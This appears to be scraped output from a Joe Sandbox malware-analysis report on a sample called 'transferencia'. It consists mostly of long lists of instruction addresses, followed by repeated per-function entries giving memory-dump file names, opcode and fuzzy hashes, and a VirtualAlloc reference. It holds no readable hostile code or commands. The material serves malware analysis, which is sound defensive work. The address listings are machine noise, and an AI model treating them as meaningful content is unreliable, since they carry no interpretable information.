																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00403d8d
0x00403d8d
0x00403d8d
0x00403d8d
0x00403d8d
0x00403d8d
0x00403d8e
0x00403d8f
0x00403d92
0x00403d95
0x00403d98
0x00403d9b
0x00403d9e
0x00403da1
0x00403da4
0x00403da7
0x00403daa
0x00403dad
0x00403db0
0x00403db3
0x00403db6
0x00403db9
0x00403dbc
0x00403dbf
0x00403dc2
0x00403dc5
0x00403dc8
0x00403dcb
0x00403dce
0x00403dd1
0x00403dd4
0x00403dd7
0x00403dda
0x00403ddd
0x00403de0
0x00403de3
0x00403de4
0x00403de6
0x00403de7
0x00403de9
0x00403dea
0x00403dec
0x00403ded
0x00403def
0x00403df0
0x00403df2
0x00403df3
0x00403df5
0x00403df6
0x00403df8
0x00403df9
0x00403dfb
0x00403dfc
0x00403dfe
0x00403dff
0x00403e00
0x00403e00
0x00403e00
0x00403e01
0x00403e02
0x00403e03
0x00403e03
0x00403e04
0x00403e05
0x00403e06
0x00403e06
0x00403e06
0x00403e07
0x00403e08
0x00403e09
0x00403e09
0x00403e09
0x00403e0a
0x00403e0b
0x00403e0c
0x00403e0c
0x00403e0c
0x00403e0d
0x00403e0e
0x00403e0f
0x00403e0f
0x00403e0f
0x00403e10
0x00403e11
0x00403e12
0x00403e12
0x00403e12
0x00403e13
0x00403e14
0x00403e15
0x00403e15
0x00403e15
0x00403e16
0x00403e17
0x00403e18
0x00403e18
0x00403e18
0x00403e19
0x00403e1a
0x00403e1b
0x00403e1b
0x00403e1b
0x00403e1c
0x00403e1d
0x00403e1e
0x00403e1e
0x00403e1e
0x00403e1f
0x00403e20
0x00403e21
0x00403e21
0x00403e21
0x00403e22
0x00403e23
0x00403e24
0x00403e24
0x00403e24
0x00403e25
0x00403e26
0x00403e27
0x00403e27
0x00403e27
0x00403e29
0x00403e2a
0x00403e2a
0x00403e2a
0x00403e2c
0x00403e2d
0x00403e2d
0x00403e2d
0x00403e2f
0x00403e30
0x00403e30
0x00403e30
0x00403e32
0x00403e33
0x00403e33
0x00403e33
0x00403e35
0x00403e36
0x00403e36
0x00403e36
0x00403e38
0x00403e39
0x00403e39
0x00403e39
0x00403e3b
0x00403e3c
0x00403e3c
0x00403e3c
0x00403e3e
0x00403e3f
0x00403e3f
0x00403e3f
0x00403e41
0x00403e42
0x00403e42
0x00403e42
0x00403e44
0x00403e45
0x00403e45
0x00403e45
0x00403e47
0x00403e48
0x00403e48
0x00403e48
0x00403e4a
0x00403e4d
0x00403e50
0x00403e53
0x00403e56
0x00403e59
0x00403e5c
0x00403e5f
0x00403e62
0x00403e65
0x00403e68
0x00403e6b
0x00403e6e
0x00403e71
0x00403e74
0x00403e74
0x00403e74
0x00403e77
0x00000000
0x00000000
0x00403e79
0x00403e79
0x00403e79
0x00403e7a
0x00403e03
0x00403e04
0x00403e05
0x00403e06
0x00403e06
0x00403e07
0x00403e08
0x00403e09
0x00403e09
0x00403e0a
0x00403e0b
0x00403e0c
0x00403e0c
0x00403e0d
0x00403e0e
0x00403e0f
0x00403e0f
0x00403e10
0x00403e11
0x00403e12
0x00403e12
0x00403e13
0x00403e14
0x00403e15
0x00403e15
0x00403e16
0x00403e17
0x00403e18
0x00403e18
0x00403e19
0x00403e1a
0x00403e1b
0x00403e1b
0x00403e1c
0x00403e1d
0x00403e1e
0x00403e1e
0x00403e1f
0x00403e20
0x00403e21
0x00403e21
0x00403e22
0x00403e23
0x00403e24
0x00403e24
0x00403e25
0x00403e26
0x00403e27
0x00403e27
0x00403e29
0x00403e2a
0x00403e2a
0x00403e2c
0x00403e2d
0x00403e2d
0x00403e2f
0x00403e30
0x00403e30
0x00403e32
0x00403e33
0x00403e33
0x00403e35
0x00403e36
0x00403e36
0x00403e38
0x00403e39
0x00403e39
0x00403e3b
0x00403e3c
0x00403e3c
0x00403e3e
0x00403e3f
0x00403e3f
0x00403e41
0x00403e42
0x00403e42
0x00403e44
0x00403e45
0x00403e45
0x00403e47
0x00000000
0x00403e47
0x00403e7c
0x00403e7c
0x00403e7c
0x00403e7d
0x00000000
0x00000000
0x00403e7f
0x00403e7f
0x00403e7f
0x00403e80
0x00000000
0x00000000
0x00403e82
0x00403e82
0x00403e82
0x00403e83
0x00000000
0x00000000
0x00403e85
0x00403e85
0x00403e85
0x00403e86
0x00000000
0x00000000
0x00403e88
0x00403e88
0x00403e88
0x00403e89
0x00000000
0x00000000
0x00403e8b
0x00403e8b
0x00403e8b
0x00403e8c
0x00000000
0x00000000
0x00403e8e
0x00403e8e
0x00403e8e
0x00403e8f
0x00000000
0x00000000
0x00403e91
0x00403e91
0x00403e91
0x00403e92
0x00000000
0x00000000
0x00403e94
0x00403e94
0x00403e94
0x00403e95
0x00000000
0x00000000
0x00403e97
0x00403e97
0x00403e97
0x00403e98
0x00000000
0x00000000
0x00403e9a
0x00403e9a
0x00403e9a
0x00403e9b
0x00000000
0x00000000
0x00403e9d
0x00403e9d
0x00403e9d
0x00403e9e
0x00000000
0x00000000
0x00403ea0
0x00403ea0
0x00403ea1
0x00000000
0x00000000
0x00403ea3
0x00403ea3
0x00403ea4
0x00000000
0x00000000
0x00403ea6
0x00403ea6
0x00403ea7
0x00000000
0x00000000
0x00403ea9
0x00403ea9
0x00403eaa
0x00000000
0x00000000
0x00403eac
0x00403eac
0x00403ead
0x00000000
0x00000000
0x00403eaf
0x00403eaf
0x00403eb0
0x00000000
0x00000000
0x00403eb2
0x00403eb2
0x00403eb3
0x00000000
0x00000000
0x00403eb5
0x00403eb5
0x00403eb6
0x00000000
0x00000000
0x00403eb8
0x00403eb8
0x00403eb9
0x00000000
0x00000000
0x00403ebb
0x00403ebb
0x00403ebc
0x00000000
0x00000000
0x00403ebe
0x00403ebe
0x00403ebf
0x00000000
0x00000000
0x00403ec1
0x00403f0d
0x00403f0e
0x00403f14
0x00403f1a
0x00403f20
0x00403f26
0x00403f2c
0x00403f32
0x00403f38
0x00403f3e
0x00403f44
0x00403f4a
0x00403f50
0x00403f56
0x00403f5c
0x00403f62
0x00403f65
0x00403f68
0x00403f6b
0x00403f6e
0x00403f71
0x00403f74
0x00403f77
0x00403f7a
0x00403f7d
0x00403f80
0x00403f83
0x00403f86
0x00403f89
0x00403f8c
0x00403f8f
0x00403f92
0x00403f95
0x00403f98
0x00403f9b
0x00403f9e
0x00403fa1
0x00403fa4
0x00403fa8
0x00403fab
0x00403fae
0x00403fb1
0x00403fb4
0x00403fb7
0x00403fba
0x00403fbd
0x00403fc0
0x00403fc3
0x00403fc6
0x00403fc9
0x00403fcc
0x00403fcf
0x00403fd2
0x00403fd5
0x00403fd8
0x00403fdb
0x00403fde
0x00403fe1
0x00403fe4
0x00403fe7
0x00403fea
0x00403fed
0x00403ff0
0x00403ff3
0x00403ff3
0x00403ff3
0x00403ff6
0x00404028
0x00404028
0x00404029
0x00000000
0x00000000
0x00000000
0x00000000
0x00403ff8
0x00403ff9
0x0040402b
0x0040402b
0x0040402c
0x00000000
0x00000000
0x00000000
0x00000000
0x00403ffb
0x00403ffc
0x0040402e
0x0040402e
0x0040402f
0x00000000
0x00000000
0x00000000
0x00000000
0x00403ffe
0x00403fff
0x00404031
0x00404031
0x00404032
0x00000000
0x00000000
0x00000000
0x00000000
0x00404001
0x00404002
0x00404034
0x00404034
0x00404035
0x00000000
0x00000000
0x00000000
0x00000000
0x00404004
0x00404005
0x00404037
0x00404037
0x00404038
0x00000000
0x00000000
0x00000000
0x00000000
0x00404007
0x00404008
0x0040403a
0x0040403a
0x0040403b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040400a
0x0040400b
0x0040403d
0x0040403d
0x0040403e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040400d
0x0040400e
0x00404040
0x00404040
0x00404041
0x00000000
0x00000000
0x00000000
0x00000000
0x00404010
0x00404011
0x00404043
0x00404043
0x00404044
0x00000000
0x00000000
0x00000000
0x00000000
0x00404013
0x00404014
0x00404046
0x00404047
0x00000000
0x00000000
0x00000000
0x00000000
0x00404016
0x00404017
0x00404049
0x00404049
0x0040404a
0x00000000
0x00000000
0x00404019
0x0040401a
0x0040404c
0x0040404c
0x0040404d
0x00000000
0x0040401c
0x0040401c
0x0040401d
0x0040404f
0x0040404f
0x00404050
0x00000000
0x0040401f
0x0040401f
0x00404020
0x00404052
0x00404052
0x00404053
0x00000000
0x00404022
0x00404022
0x00404023
0x00404055
0x00404055
0x00404056
0x00000000
0x00404025
0x00404025
0x00404026
0x00404058
0x00404058
0x00404059
0x0040405b
0x0040405b
0x0040405c
0x0040405e
0x0040405e
0x0040405f
0x00404061
0x00404061
0x00404062
0x00404064
0x00404064
0x00404065
0x00404067
0x00404067
0x00404068
0x0040406a
0x0040406a
0x0040406b
0x0040406d
0x0040406d
0x0040406e
0x00404070
0x00404070
0x00404071
0x00404073
0x00404073
0x00404076
0x00404076
0x00000000
0x00000000
0x00000000
0x00000000
0x00404026
0x00404023
0x00404020
0x0040401d
0x0040401a
0x00404017
0x00404014
0x00404011
0x0040400e
0x0040400b
0x00404008
0x00404005
0x00404002
0x00403fff
0x00403ffc
0x00403ff9
0x0040407d
0x00404091
0x0040409a
0x004040a2
0x004040a4
0x004040a8
0x004040ac
0x004040af
0x004040b2
0x004040b4
0x004040b7
0x004040f7
0x00404108
0x00404110
0x0040411d
0x0040411f
0x00404121
0x00404123
0x00404125
0x00404129
0x0040412b
0x0040412e
0x00404131
0x00404132
0x00404134
0x0040417a
0x0040418b
0x0040418d
0x00404198
0x0040419c
0x0040419e
0x004041a2
0x004041a4
0x004041ab
0x004041af
0x004041f0
0x00404207
0x00404209
0x00404210
0x00404216
0x0040421a
0x0040421c
0x0040421e
0x00404220
0x00404222
0x00404224
0x00404228
0x0040422c
0x0040426c
0x00404270
0x00404274
0x00404276
0x00404276
0x00404284
0x0040428f
0x00404292
0x00404294
0x00404296
0x00404299
0x0040429b
0x0040429f
0x004042a1
0x004042e3
0x004042e7
0x004042ee
0x004042f6
0x004042fc
0x0040430a
0x00404315
0x0040431e
0x00404321
0x00404324
0x00404328
0x0040432b
0x0040432e
0x00404330
0x00404333
0x00404336
0x00404338
0x00404368
0x00404387
0x0040438b
0x00404394
0x00404398
0x0040439a
0x0040439c
0x004043a0
0x004043a2
0x004043a4
0x004043a7
0x004043aa
0x004043ac
0x004043ae
0x004043ea
0x004043fd
0x0040440c
0x00404413
0x0040441b
0x00404421
0x00404425
0x00404427
0x0040442b
0x0040442d
0x0040442f
0x00404431
0x00404435
0x0040446d
0x00404472
0x00404484
0x0040448c
0x00404494
0x0040449a
0x004044a6
0x004044ad
0x004044b1
0x004044b7
0x004044bb
0x004044bd
0x004044be
0x004044c0
0x004044f4
0x004044f6
0x0040450a
0x0040451b
0x00404520
0x0040452e
0x00404530
0x00404534
0x00404536
0x0040453a
0x0040453e
0x00404540
0x00404542
0x00404546
0x00404585
0x0040458d
0x0040459a
0x004045a4
0x004045a6
0x004045a8
0x004045b6
0x004045ba
0x004045bb
0x004045be
0x004045c1
0x004045c3
0x004045c5
0x004045c7
0x004045c9
0x00404600
0x0040460b
0x0040460f
0x0040461f
0x00404629
0x0040462b
0x0040462e
0x00404631
0x00404633
0x00404635
0x0040463a
0x0040463e
0x00404640
0x00404682
0x00404686
0x00404688
0x0040468c
0x0040468c
0x00404690
0x00404694
0x0040469c
0x004046a0
0x004046ac
0x004046ae
0x004046b0
0x004046b4
0x004046b9
0x004046bb
0x004046be
0x00404721
0x00404725
0x0040472e
0x00404734
0x00404738
0x0040473a
0x0040473b
0x0040473d
0x00404740
0x00404742
0x00404743
0x00404745
0x0040478c
0x004047a1
0x004047a4
0x004047b5
0x004047b9
0x004047bb
0x004047bd
0x004047c1
0x004047c4
0x004047c7
0x00404801
0x00404805
0x00404831
0x00404833
0x00404836
0x00404838
0x0040483a
0x0040483c
0x0040483e
0x00404840
0x0040487a
0x00404883
0x0040488c
0x00404894
0x0040489a
0x004048a0
0x004048a2
0x004048a9
0x004048ad
0x004048b4
0x004048b6
0x004048b8
0x004048bd
0x004048c1
0x004048c3
0x004048c7
0x004048cb
0x0040491e
0x0040492a
0x0040492e
0x00404932
0x00404934
0x00404939
0x0040493b
0x0040493f
0x00404944
0x00404946
0x00404949
0x0040494a
0x0040494c
0x0040494f
0x0040498b
0x00404996
0x00404998
0x004049ab
0x004049ba
0x004049bc
0x004049bd
0x004049bf
0x004049c2
0x004049c4
0x004049c5
0x004049fe
0x00404a0b
0x00404a0f
0x00404a13
0x00404a1f
0x00404a25
0x00404a2e
0x00404a32
0x00404a36
0x00404a38
0x00404a3a
0x00404a3e
0x00404a81
0x00404a86
0x00404a93
0x00404a9a
0x00404a9c
0x00404aa7
0x00404aa9
0x00404ab0
0x00404ab3
0x00404ab6
0x00404ab8
0x00404aba
0x00404abc
0x00404abe
0x00404af9
0x00404afe
0x00404b03
0x00404b0a
0x00404b11
0x00404b16
0x00404b1f
0x00404b24
0x00404b28
0x00404b2b
0x00404b2d
0x00404b2f
0x00404b34
0x00404b38
0x00404b3a
0x00404b85
0x00404b8d
0x00404b91
0x00404b93
0x00404b9a
0x00404ba9
0x00404bab
0x00404bad
0x00404bb1
0x00404bb6
0x00404bb8
0x00404bbb
0x00404bf1
0x00404bfd
0x00404c05
0x00404c0e
0x00404c14
0x00404c1d
0x00404c24
0x00404c26
0x00404c2c
0x00404c30
0x00404c32
0x00404c33
0x00404c35
0x00404c38
0x00404c3a
0x00404c3c
0x00404c3e
0x00404c7f
0x00404c8d
0x00404c8f
0x00404c99
0x00404caf
0x00404cbb
0x00404cbd
0x00404cbf
0x00404cc0
0x00404cc2
0x00404cc3
0x00404cc5
0x00404cc7
0x00404cca
0x00404cce
0x00404d0b
0x00404d13
0x00404d1c
0x00404d23
0x00404d2b
0x00404d34
0x00404d42
0x00404d44
0x00404d48
0x00404d4a
0x00404d4d
0x00404d4f
0x00404d51
0x00404d53
0x00404d90
0x00404da6
0x00404da9
0x00404dac
0x00404db4
0x00404db6
0x00404db7
0x00404db9
0x00404dbd
0x00404dbf
0x00404dc0
0x00404dc0
0x00404dc2
0x00404dc4
0x00404dc4
0x00404dcc
0x00404dcd
0x00404dcd
0x00404dc0
0x00000000
0x00403e48
0x00403e45
0x00403e42
0x00403e3f
0x00403e3c
0x00403e39
0x00403e36
0x00403e33
0x00403e30
0x00403e2d
0x00403e2a
0x00403e27
0x00403e24
0x00403e21
0x00403e1e
0x00403e1b
0x00403e18
0x00403e15
0x00403e12
0x00403e0f
0x00403e0c
0x00403e09
0x00403e06
0x00403e03

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77869f6b2f397f59315fb57ae18f37a55d1dfa1f4f4debef1c14d35b8aa7cde2
Instruction ID: cc99d2ea3b783d1298f667da8985c226cf0dfe11c5e5cba30983e245bbba78dd
Opcode Fuzzy Hash: 77869f6b2f397f59315fb57ae18f37a55d1dfa1f4f4debef1c14d35b8aa7cde2
Instruction Fuzzy Hash: 10722462B497400BC75AD8BE48D146799C78FDF210329E23EA21CF73A6ED7ACD0B5149

Uniqueness

Uniqueness Score: -1.00%

Function 004040BF, Relevance: 2.4, APIs: 1, Instructions: 1178
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d606c818e146f9a2d4be44c2ad8960f3e818b35eb86801e32207870d66fac1ab
Instruction ID: 5b68d3d3c48eff42e69ce7a456a1b7bf2c9e19e360940a5ba218ad569893b3a9
Opcode Fuzzy Hash: d606c818e146f9a2d4be44c2ad8960f3e818b35eb86801e32207870d66fac1ab
Instruction Fuzzy Hash: 03425C62B097000B875998BE88D0956D0C7DFEF25037AE63E662DE33A5FDB9CD4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404139, Relevance: 2.4, APIs: 1, Instructions: 1120
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 52e7386e1194bf562d6c673f0648cf4aff23b27f984c6650ccc05ec7c3705501
Instruction ID: 37b01e39d93f318c786654b021f86fd6676fef1dd40231a2d61e9d9a1c411d99
Opcode Fuzzy Hash: 52e7386e1194bf562d6c673f0648cf4aff23b27f984c6650ccc05ec7c3705501
Instruction Fuzzy Hash: F2326C62B097000B875998BE88D0957D0C7DFEF25027AE63E662DE33A5FDB9CD0B1148

Uniqueness

Uniqueness Score: -1.00%

Function 004041B5, Relevance: 2.3, APIs: 1, Instructions: 1070
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 026efff44fb7bcf25219b53f6c8336027cf3d674bb9edf941a992d9da507a4da
Instruction ID: 0b08689955dc542b533827465ba989cbfba1b6ec1ed2db0e52bba281845589b2
Opcode Fuzzy Hash: 026efff44fb7bcf25219b53f6c8336027cf3d674bb9edf941a992d9da507a4da
Instruction Fuzzy Hash: B3326C62B097000B875998BE88D0956D0C7DFEF26027AE63A652DE33A5FDBDCD4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404233, Relevance: 2.3, APIs: 1, Instructions: 1038
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8177509d96d1a66dcc5b41500dc0dfa0207833820d7c2f2c736269478284cd81
Instruction ID: 2b17672bd6001da0f4b19fc4e1015487c1da673da33637ec9bc80b530b2caa52
Opcode Fuzzy Hash: 8177509d96d1a66dcc5b41500dc0dfa0207833820d7c2f2c736269478284cd81
Instruction Fuzzy Hash: 3F326C62B097000B975998BE88D0956D0C7DFEF26027AE63A652DE33A5FDBDCD0B114C

Uniqueness

Uniqueness Score: -1.00%

Function 004043B6, Relevance: 2.2, APIs: 1, Instructions: 973
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: de845c919ab0c12cdf430a43385766b459470f3edc8f598d110fb3237db71050
Instruction ID: e315f186401e61c867643f3c4840fa4099ab82004142a4b55da1a4fce037f5b1
Opcode Fuzzy Hash: de845c919ab0c12cdf430a43385766b459470f3edc8f598d110fb3237db71050
Instruction Fuzzy Hash: 49124B62B0A7000B975994BE88D0957D0C7DFEF26023AE63A652DE33A5FD7DCD4B1248

Uniqueness

Uniqueness Score: -1.00%

Function 0040433B, Relevance: 2.2, APIs: 1, Instructions: 969
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5566739d2b1e11608893cfc421bbda787e5e507f2b8664a72757807f7e59ccea
Instruction ID: 4355ecf133fc934e50ece24f52d7a53f9e2f75c7d475d8eff700739d37af9b02
Opcode Fuzzy Hash: 5566739d2b1e11608893cfc421bbda787e5e507f2b8664a72757807f7e59ccea
Instruction Fuzzy Hash: AB226C62B097000B975998BE88D0957D0C7DFEF260279E63A652DE33A5FDBDCD0B1248

Uniqueness

Uniqueness Score: -1.00%

Function 0040443C, Relevance: 2.2, APIs: 1, Instructions: 912
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e7b19cf48e3cc042807b80d447f7828f95514de03df08d929108d572fd7fcbe0
Instruction ID: ca45c1360be9e6ccbfb7ab546caa656fc76b4eb12257b736d0a1a851db962341
Opcode Fuzzy Hash: e7b19cf48e3cc042807b80d447f7828f95514de03df08d929108d572fd7fcbe0
Instruction Fuzzy Hash: 7F124962B0A7000B975994BE88D0957C0C7DFEF26027AE63A652DE33A5FD7DCD4B1248

Uniqueness

Uniqueness Score: -1.00%

Function 004044C5, Relevance: 2.1, APIs: 1, Instructions: 867
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6664b63a16f6fd925ce43ae8c6dd0774f1c801300006258e80d8afe094f99273
Instruction ID: a5f6b7ccdeccc548a024686bb1b8e0780df0f82266441cb4a3333964c23749c3
Opcode Fuzzy Hash: 6664b63a16f6fd925ce43ae8c6dd0774f1c801300006258e80d8afe094f99273
Instruction Fuzzy Hash: 05124862B0A7000B975994BE88D0957D0C7CFEF26033AE63A652DE73A5FD79CD4B1248

Uniqueness

Uniqueness Score: -1.00%

Function 0040454B, Relevance: 2.1, APIs: 1, Instructions: 864
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f9accfd1522af944c9861fbf2d2cfd7bec011b2edeb78c038bf41d4ab94e83b6
Instruction ID: e01588748477fae116f51bbc88a4e4022fd97800a21ce8f4437735f63538f655
Opcode Fuzzy Hash: f9accfd1522af944c9861fbf2d2cfd7bec011b2edeb78c038bf41d4ab94e83b6
Instruction Fuzzy Hash: 9F023862B0A7000B975994BE88D0957D0C7DFEF26033AE63A652DE33A5FD79CD4B1248

Uniqueness

Uniqueness Score: -1.00%

Function 004045CD, Relevance: 2.1, APIs: 1, Instructions: 803
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0f9120aba01204df08ddf5695bf8f0f9dcf32ac839f6869e8914a96361a6bd64
Instruction ID: 66c4633aa6af8c37c623d917da85986e10f6b7de6d97b4130257676fcbba4b9d
Opcode Fuzzy Hash: 0f9120aba01204df08ddf5695bf8f0f9dcf32ac839f6869e8914a96361a6bd64
Instruction Fuzzy Hash: 86024762B0A7000B975994BE88D0957D0C7DFEF26033AE63A652DE33A4FD79CD4B1248

Uniqueness

Uniqueness Score: -1.00%

Function 00404646, Relevance: 2.0, APIs: 1, Instructions: 766
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12adeddcb530ac6534928e2238fd2b4bd146edfc01c3bed5ce639cb2256987f7
Instruction ID: 1bb1e495db126c96d3cf778db04a03a1dea19ad5b592d90060ff49eef59b2e9d
Opcode Fuzzy Hash: 12adeddcb530ac6534928e2238fd2b4bd146edfc01c3bed5ce639cb2256987f7
Instruction Fuzzy Hash: 5EF15762B0A7000B875994BE88D0957D4C7DFEF26033AE63A652DE33A4FD79CD4B1248

Uniqueness

Uniqueness Score: -1.00%

Function 004046C1, Relevance: 2.0, APIs: 1, Instructions: 739
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
